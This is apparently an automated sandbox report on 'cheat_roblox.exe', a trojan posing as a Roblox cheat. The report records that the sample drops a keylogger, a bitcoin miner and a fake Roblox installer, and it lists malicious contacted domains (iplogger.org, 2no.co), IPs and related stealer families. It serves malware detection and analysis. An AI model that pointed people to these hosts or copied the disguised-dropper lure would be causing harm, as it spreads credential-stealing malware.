                                      https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio64RobloxPlayerInstaller.exe, 00000004.00000002.1516990822.000000000479D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508776431.000000000479D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://iplogger.org/rules/chromecache_71.10.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://bit.ly/1eMQ42Ucheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.certigna.fr/certignarootca.crl01RobloxPlayerInstaller.exe, 00000004.00000003.1509281680.00000000047B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517063706.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509159312.00000000047AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508502616.00000000047A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508083550.00000000047C3000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.00000000047BE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.cert.fnmt.es/dpcs/RobloxPlayerInstaller.exe, 00000004.00000003.1509281680.00000000047B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517091060.00000000047B6000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509159312.00000000047AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509602105.00000000047B5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508502616.00000000047A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.winimage.com/zLibDllcheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://s3.amazonaws.com/RobloxPlayerInstaller.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.accv.es00RobloxPlayerInstaller.exe, 00000004.00000002.1516960770.0000000004790000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://2no.co/chromecache_71.10.drfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://ecsv2.roblox.com/client/pbecheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516172847.000000000255F000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509897327.000000000255D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://2no.co/redirect-2chromecache_71.10.drfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperateRobloxPlayerInstaller.exe, 00000004.00000002.1517491839.00000000047FB000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.00000000047BE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.00000000047F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      128.116.21.4
                                      		edge-term4-ams2.roblox.comUnited States
                                      		22697ROBLOX-PRODUCTIONUSfalse
                                      99.86.4.125
                                      		d2v57ias1m20gl.cloudfront.netUnited States
                                      		16509AMAZON-02USfalse
                                      239.255.255.250
                                      		unknownReserved
                                      		unknownunknownfalse
                                      88.212.202.52
                                      		counter.yadro.ruRussian Federation
                                      		39134UNITEDNETRUfalse
                                      142.250.181.228
                                      		unknownUnited States
                                      		15169GOOGLEUSfalse
                                      35.190.80.1
                                      		a.nel.cloudflare.comUnited States
                                      		15169GOOGLEUSfalse
                                      142.250.184.228
                                      		www.google.comUnited States
                                      		15169GOOGLEUSfalse
                                      104.21.4.208
                                      		cdn.iplogger.orgUnited States
                                      		13335CLOUDFLARENETUSfalse
                                      88.212.201.204
                                      		unknownRussian Federation
                                      		39134UNITEDNETRUfalse
                                      172.67.149.76
                                      		2no.coUnited States
                                      		13335CLOUDFLARENETUSfalse

                                      Private

                                      IP
                                      192.168.2.16
                                      192.168.2.9
                                      192.168.2.10
                                      127.0.0.1

                                      General Information

                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1484385
                                      Start date and time:2024-07-30 00:48:09 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 44s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:16
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:cheat_roblox.exe
                                      Detection:MAL
                                      Classification:mal56.troj.spyw.evad.winEXE@24/21@20/14
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 199.232.214.172, 142.250.185.195, 142.250.186.78, 74.125.133.84, 34.104.35.123, 192.229.221.95, 142.250.186.131, 142.250.74.206
                                      • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: cheat_roblox.exe

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      18:49:02API Interceptor4x Sleep call for process: RobloxPlayerInstaller.exe modified

                                      LLM Input / Output

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      239.255.255.250http://pub-2fad846527d7473aa1d1ed2a45595d9d.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                        roblox cheat.exeGet hashmaliciousXWormBrowse
                                          http://ipfs.io/ipfs/QmdV2HGdtwWnonRSvaFvw4QTsSJKp6SREdhoc9BgEawLxT/Karyo.htmlGet hashmaliciousHTMLPhisherBrowse
                                            https://proposaljennycarlys.wordpress.com/Get hashmaliciousUnknownBrowse
                                              https://kapitan.co.ke/ch/f/signin.phpGet hashmaliciousUnknownBrowse
                                                http://2323.pages.dev/Get hashmaliciousUnknownBrowse
                                                  https://nadiperformance-f5135f.ingress-earth.ewp.live/wp-content/plugins/kredittikay%C4%B1l/pages/region.phpGet hashmaliciousUnknownBrowse
                                                    http://www.kjecom.com/serviciodecorreo/login/Get hashmaliciousUnknownBrowse
                                                      http://pub-1dce8f5133cd41708dc3ec7e6864bb58.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                        http://s.id/helpcenter84619Get hashmaliciousHTMLPhisherBrowse
                                                          88.212.202.52http://pornolab.net/forum/viewtopic.php?t=2398569Get hashmaliciousUnknownBrowse
                                                          • counter.yadro.ru/hit?t14.6;r;s1280*1024*24;0.15319494098503506
                                                          128.116.21.4RdJ73GU3N1.exeGet hashmaliciousNjratBrowse
                                                            SecuriteInfo.com.Win32.BackdoorX-gen.25355.5373.exeGet hashmaliciousUnknownBrowse
                                                              Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                104.21.4.208B111141595018D6980A609315F572F827D7FA913454A785EEBC7376019ECE195.exeGet hashmaliciousBdaejecBrowse
                                                                  4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                    4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                        setup.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, RedLine, Stealc, Stealerium, VidarBrowse
                                                                          1720605557.036432_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, Socks5Systemz, Stealc, Stealerium, VidarBrowse
                                                                            AgHiy5gaGp.exeGet hashmaliciousAmadey, PureLog StealerBrowse
                                                                              SecuriteInfo.com.BackDoor.SpyBotNET.62.21177.12908.exeGet hashmaliciousEICAR, PureLog Stealer, zgRATBrowse
                                                                                SecuriteInfo.com.Win64.Evo-gen.4435.12354.exeGet hashmaliciousCryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                  CHA0VZiz8y.exeGet hashmaliciousCryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, VidarBrowse
                                                                                    99.86.4.125http://armannlakeltd.wixsite.com/btinternet/Get hashmaliciousUnknownBrowse
                                                                                      http://dalipthukral0.wixsite.com/updateeGet hashmaliciousUnknownBrowse
                                                                                        http://mgcvuei.wixsite.com/my-siteGet hashmaliciousUnknownBrowse
                                                                                          cheat.exeGet hashmaliciousUnknownBrowse
                                                                                            http://dvcgfqohwce.wixsite.com/my-site-1Get hashmaliciousUnknownBrowse
                                                                                              http://sites.google.com/l0gin-microsoftwebonlne.app/867487/Get hashmaliciousUnknownBrowse
                                                                                                http://sites.google.com/l0gin-microsoftwebonlne.app/867487/Get hashmaliciousUnknownBrowse
                                                                                                  http://sites.google.com/l0gin-microsoftwebonlne.app/867487/Get hashmaliciousUnknownBrowse
                                                                                                    https://www.onedrive-strabag.com/Get hashmaliciousUnknownBrowse
                                                                                                      https://loginaccount70.wixsite.com/my-site-2/Get hashmaliciousUnknownBrowse

                                                                                                        Domains

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        cdn.iplogger.orgroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                                                        • 172.67.132.113
                                                                                                        4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                                                        • 172.67.132.113
                                                                                                        4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                                                        • 104.21.4.208
                                                                                                        rpeticao_inicial.vbsGet hashmaliciousUnknownBrowse
                                                                                                        • 172.67.132.113
                                                                                                        DN0yi6SRZL.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 148.251.234.83
                                                                                                        https://maper.infoGet hashmaliciousUnknownBrowse
                                                                                                        • 148.251.234.83
                                                                                                        p68hEdbp8M.exeGet hashmaliciousGurcu Stealer, RedLine, VidarBrowse
                                                                                                        • 148.251.234.83
                                                                                                        6wXMsDIz1A.exeGet hashmaliciousGurcu Stealer, RedLineBrowse
                                                                                                        • 148.251.234.83
                                                                                                        SJv6Gz8cGp.exeGet hashmaliciousRedLine, Typhon LoggerBrowse
                                                                                                        • 148.251.234.83
                                                                                                        12D3EC70F3A079AE0216EE7B56722E2369EB664DE0036.exeGet hashmaliciousAzorult, RedLineBrowse
                                                                                                        • 148.251.234.83
                                                                                                        edge-term4-ams2.roblox.comroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                                                        • 128.116.21.3
                                                                                                        RdJ73GU3N1.exeGet hashmaliciousNjratBrowse
                                                                                                        • 128.116.21.4
                                                                                                        SecuriteInfo.com.Win32.BackdoorX-gen.25355.5373.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 128.116.21.4
                                                                                                        Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 128.116.21.4
                                                                                                        Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 128.116.21.3
                                                                                                        counter.yadro.ruroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                                                        • 88.212.201.198
                                                                                                        LisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 88.212.201.204
                                                                                                        LisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 88.212.201.204
                                                                                                        http://ads.livetv799.meGet hashmaliciousUnknownBrowse
                                                                                                        • 88.212.202.52
                                                                                                        4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                                                        • 88.212.201.204
                                                                                                        4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                                                        • 88.212.202.52
                                                                                                        file.exeGet hashmaliciousXenoRATBrowse
                                                                                                        • 88.212.202.52
                                                                                                        http://singlelogin.rsGet hashmaliciousUnknownBrowse
                                                                                                        • 88.212.201.198
                                                                                                        https://onpagvus.storeGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 88.212.201.198
                                                                                                        http://cb00287.tw1.ru/Get hashmaliciousUnknownBrowse
                                                                                                        • 88.212.201.198
                                                                                                        2no.coroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                                                        • 172.67.149.76
                                                                                                        C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exeGet hashmaliciousBdaejec, BitCoin Miner, XmrigBrowse
                                                                                                        • 104.21.79.229
                                                                                                        lSmb6nDsrC.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                        • 104.21.79.229
                                                                                                        setup.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.79.229
                                                                                                        setup.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.79.229
                                                                                                        file.exeGet hashmaliciousXenoRATBrowse
                                                                                                        • 172.67.149.76
                                                                                                        Og1SeeXcB2.exeGet hashmaliciousRemcos, Blank Grabber, PrivateLoader, SmokeLoaderBrowse
                                                                                                        • 104.21.79.229
                                                                                                        file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                        • 104.21.79.229
                                                                                                        rpeticao_inicial.vbsGet hashmaliciousUnknownBrowse
                                                                                                        • 172.67.149.76
                                                                                                        setup.htaGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                        • 104.21.79.229

                                                                                                        ASNs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        UNITEDNETRUroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                                                        • 88.212.201.204
                                                                                                        Universal Radio Programmer.pdfGet hashmaliciousUnknownBrowse
                                                                                                        • 88.212.201.204
                                                                                                        LisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 88.212.201.204
                                                                                                        LisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 88.212.201.204
                                                                                                        http://ads.livetv799.meGet hashmaliciousUnknownBrowse
                                                                                                        • 88.212.202.52
                                                                                                        4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                                                        • 88.212.201.204
                                                                                                        4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                                                        • 88.212.201.204
                                                                                                        file.exeGet hashmaliciousXenoRATBrowse
                                                                                                        • 88.212.202.52
                                                                                                        http://singlelogin.rsGet hashmaliciousUnknownBrowse
                                                                                                        • 88.212.202.52
                                                                                                        https://onpagvus.storeGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 88.212.201.204
                                                                                                        ROBLOX-PRODUCTIONUSroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                                                        • 128.116.21.3
                                                                                                        Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 128.116.123.3
                                                                                                        Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 128.116.123.4
                                                                                                        Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 128.116.123.4
                                                                                                        Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 128.116.127.3
                                                                                                        Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 128.116.119.4
                                                                                                        RdJ73GU3N1.exeGet hashmaliciousNjratBrowse
                                                                                                        • 128.116.21.4
                                                                                                        SecuriteInfo.com.Win32.BackdoorX-gen.25355.5373.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 128.116.21.4
                                                                                                        Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 128.116.21.4
                                                                                                        Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 128.116.21.3
                                                                                                        AMAZON-02UShttp://pub-2fad846527d7473aa1d1ed2a45595d9d.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                        • 52.58.254.253
                                                                                                        roblox cheat.exeGet hashmaliciousXWormBrowse
                                                                                                        • 18.239.18.53
                                                                                                        https://proposaljennycarlys.wordpress.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 13.227.219.11
                                                                                                        https://kapitan.co.ke/ch/f/signin.phpGet hashmaliciousUnknownBrowse
                                                                                                        • 18.193.237.78
                                                                                                        http://pub-1dce8f5133cd41708dc3ec7e6864bb58.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                        • 52.58.254.253
                                                                                                        http://pub-91cd24230d1a47f198e6036ff20062e7.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                        • 35.156.224.161
                                                                                                        http://pub-5ef76d7c843349bb9d3d1a0a081c814c.r2.dev/bea40.htmlGet hashmaliciousUnknownBrowse
                                                                                                        • 3.70.101.28
                                                                                                        https://logn-sso-ttrezor.webflow.io/Get hashmaliciousUnknownBrowse
                                                                                                        • 108.156.61.158
                                                                                                        http://pub-1319180bb90248deb7023e5f86025f65.r2.dev/zane.htmlGet hashmaliciousUnknownBrowse
                                                                                                        • 3.70.101.28
                                                                                                        http://stonemanwell147.wixsite.com/myd0czGet hashmaliciousUnknownBrowse
                                                                                                        • 108.156.60.6

                                                                                                        JA3 Fingerprints

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        1138de370e523e824bbca92d049a3777http://2323.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                        • 23.206.229.209
                                                                                                        http://www.kjecom.com/serviciodecorreo/login/Get hashmaliciousUnknownBrowse
                                                                                                        • 23.206.229.209
                                                                                                        http://matmcst.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                                                        • 23.206.229.209
                                                                                                        http://pub-91cd24230d1a47f198e6036ff20062e7.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                        • 23.206.229.209
                                                                                                        http://connectinmate.org/@@@/cancelss/index.phpGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 23.206.229.209
                                                                                                        https://dweb.link/ipfs/bafkreiawdiwmd7ylz26ssoykvo7gopw6heodzdjcfhtb3v6dkm6k57iqwuGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 23.206.229.209
                                                                                                        http://pub-1319180bb90248deb7023e5f86025f65.r2.dev/zane.htmlGet hashmaliciousUnknownBrowse
                                                                                                        • 23.206.229.209
                                                                                                        https://orr.swq.mybluehost.me/ch/Get hashmaliciousUnknownBrowse
                                                                                                        • 23.206.229.209
                                                                                                        https://urlz.fr/rpWMGet hashmaliciousUnknownBrowse
                                                                                                        • 23.206.229.209
                                                                                                        https://impactuvoirome-f5135f.ingress-baronn.ewp.live/wp-content/plugins/kredittikay%C4%B1l/pages/region.phpGet hashmaliciousUnknownBrowse
                                                                                                        • 23.206.229.209
                                                                                                        28a2c9bd18a11de089ef85a160da29e4http://pub-2fad846527d7473aa1d1ed2a45595d9d.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                        • 40.127.169.103
                                                                                                        • 184.28.90.27
                                                                                                        • 20.3.187.198
                                                                                                        • 52.165.165.26
                                                                                                        • 20.114.59.183
                                                                                                        roblox cheat.exeGet hashmaliciousXWormBrowse
                                                                                                        • 40.127.169.103
                                                                                                        • 184.28.90.27
                                                                                                        • 20.3.187.198
                                                                                                        • 52.165.165.26
                                                                                                        • 20.114.59.183
                                                                                                        http://ipfs.io/ipfs/QmdV2HGdtwWnonRSvaFvw4QTsSJKp6SREdhoc9BgEawLxT/Karyo.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 40.127.169.103
                                                                                                        • 184.28.90.27
                                                                                                        • 20.3.187.198
                                                                                                        • 52.165.165.26
                                                                                                        • 20.114.59.183
                                                                                                        https://kapitan.co.ke/ch/f/signin.phpGet hashmaliciousUnknownBrowse
                                                                                                        • 40.127.169.103
                                                                                                        • 184.28.90.27
                                                                                                        • 20.3.187.198
                                                                                                        • 52.165.165.26
                                                                                                        • 20.114.59.183
                                                                                                        http://2323.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                        • 40.127.169.103
                                                                                                        • 184.28.90.27
                                                                                                        • 20.3.187.198
                                                                                                        • 52.165.165.26
                                                                                                        • 20.114.59.183
                                                                                                        https://nadiperformance-f5135f.ingress-earth.ewp.live/wp-content/plugins/kredittikay%C4%B1l/pages/region.phpGet hashmaliciousUnknownBrowse
                                                                                                        • 40.127.169.103
                                                                                                        • 184.28.90.27
                                                                                                        • 20.3.187.198
                                                                                                        • 52.165.165.26
                                                                                                        • 20.114.59.183
                                                                                                        http://www.kjecom.com/serviciodecorreo/login/Get hashmaliciousUnknownBrowse
                                                                                                        • 40.127.169.103
                                                                                                        • 184.28.90.27
                                                                                                        • 20.3.187.198
                                                                                                        • 52.165.165.26
                                                                                                        • 20.114.59.183
                                                                                                        http://pub-1dce8f5133cd41708dc3ec7e6864bb58.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                        • 40.127.169.103
                                                                                                        • 184.28.90.27
                                                                                                        • 20.3.187.198
                                                                                                        • 52.165.165.26
                                                                                                        • 20.114.59.183
                                                                                                        http://s.id/helpcenter84619Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 40.127.169.103
                                                                                                        • 184.28.90.27
                                                                                                        • 20.3.187.198
                                                                                                        • 52.165.165.26
                                                                                                        • 20.114.59.183
                                                                                                        http://matmcst.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                                                        • 40.127.169.103
                                                                                                        • 184.28.90.27
                                                                                                        • 20.3.187.198
                                                                                                        • 52.165.165.26
                                                                                                        • 20.114.59.183

                                                                                                        Dropped Files

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        C:\Users\user\AppData\Local\Temp\Keyloger.exeroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                                                          C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                                                            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeroblox cheat.exeGet hashmaliciousXWormBrowse
                                                                                                              C:\Users\user\AppData\Local\Temp\ msedge.exeroblox cheat.exeGet hashmaliciousXWormBrowse

                                                                                                                Created / dropped Files

                                                                                                                C:\Users\user\AppData\Local\Roblox\logs\RobloxPlayerInstaller_9F112.log

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe
                                                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):3804
                                                                                                                Entropy (8bit):5.339616712647284
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:DD/yZdviDSGAkir0ClZvKH3F1gZ6ubDgZ6ubzsgZ6ubrvKLYZJFcUDK4z/8Y5Uye:fAd8b8ov8URnrhnPJYIJEJZJqGOvbJA5
                                                                                                                MD5:DA6067E28A5CFDC0C1EB82265109B8D3
                                                                                                                SHA1:9DB81A7E5BF5FDD1EFD8222B1F84F643575478AD
                                                                                                                SHA-256:464DC28CDEB713760C93571ED60887F23676320E1425B9F569A751D35E477BD7
                                                                                                                SHA-512:2E3BE9007099E79E0DA78C4D86ABAA7AD36E110D3841F0A36C48B222965BF4036197F155DB8FCD8D49162AE8EC5617FE3FA849D715BD96005C517E67112A3627
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:2024-07-29T22:49:00.013Z..2024-07-29T22:49:00.223Z,0.223897,1e70,6,Info [FLog::DesktopInstaller] The installer reporter is initialized..2024-07-29T22:49:00.223Z,0.223981,1e70,6,Info [FLog::DesktopInstaller] Reporting Installer Start..2024-07-29T22:49:01.233Z,1.233822,1ee4,6,Info [FLog::DesktopInstaller] Start the Installer thread..2024-07-29T22:49:01.262Z,1.262174,1ee4,6,Info [FLog::DesktopInstaller] The installer will run InstallNormal..2024-07-29T22:49:01.262Z,1.262262,1ee4,6,Info [FLog::DesktopInstaller] Fetch flag info..2024-07-29T22:49:02.081Z,2.081721,1edc,6,Critical [FLog::DesktopInstaller] failed Http GET url: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper, code: 11, message: HttpError: TlsVerificationFail, body: ..2024-07-29T22:49:31.667Z,31.667459,1edc,6,Critical [FLog::DesktopInstaller] failed Http GET url: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper, code: 11, message: HttpError: TlsVerificationFail, b

                                                                                                                C:\Users\user\AppData\Local\Roblox\logs\cacert.pem

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe
                                                                                                                File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):233235
                                                                                                                Entropy (8bit):6.025218023713329
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:OhGvwW6Jj7ITWYv0yoVH283rz9WqIAsjjg4DsUQS88UP4TFf3xVOVkCC554jMN/C:M5W+j8chWf8xyvp5iIzB4CNxza/MK
                                                                                                                MD5:0194EB945475F93844C0FAE769C0FA0B
                                                                                                                SHA1:D72876A801C702348EA5B4B4A333C484F2A721FD
                                                                                                                SHA-256:A6BC06B8255E4AFE2EEFF34684605D04DF9EC246FC201BF5E44137987189A0D3
